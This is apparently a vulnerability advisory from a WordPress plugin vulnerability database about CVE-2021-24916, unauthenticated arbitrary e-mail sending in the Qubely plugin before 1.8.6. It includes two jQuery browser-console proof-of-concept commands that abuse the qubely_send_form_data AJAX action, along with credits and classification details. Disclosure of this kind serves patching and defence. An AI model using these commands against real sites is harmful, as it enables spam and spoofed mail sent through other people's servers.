WordPress Plugin Vulnerabilities

Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending

Description

The plugin allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.

Proof of Concept

Execute the below command in the web developer console, on the blog homepage as an unauthenticated user, replacing domain by the domain of the blog:

Current PoC:

jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': 'victim@whatever.com', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })


Pre-1.8.5 PoC:


jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('victim@whatever.com'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });

Affects Plugins

Plugin icon
qubely
Fixed in 1.8.6

References

CVE
CVE-2021-24916

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
93b893be-59ad-4500-8edb-9fa7a45304d5

Timeline

Publicly Published
2023-07-17 (about 10 months ago)
Added
2023-07-17 (about 10 months ago)
Last Updated
2023-07-17 (about 10 months ago)

Other

Published
Title
Published
2020-12-09
Title
DiveBook <= 1.1.4 - Improper Authorisation Check
Published
2021-07-05
Title
Filter Gallery < 0.0.7 - Unauthorised AJAX Calls
Published
2022-05-18
Title
Jupiter < 6.10.2 & JupiterX < 2.0.7 - Subscriber+ Path Traversal and Local File Inclusion
Published
2022-07-26
Title
WPGraphQL WooCommerce < 0.12.4 - Unauthenticated Coupon Codes Disclosure
Published
2021-05-26
Title
Multivendor Marketplace Solution for WooCommerce < 3.7.4 - Unauthenticated Arbitrary Product Comment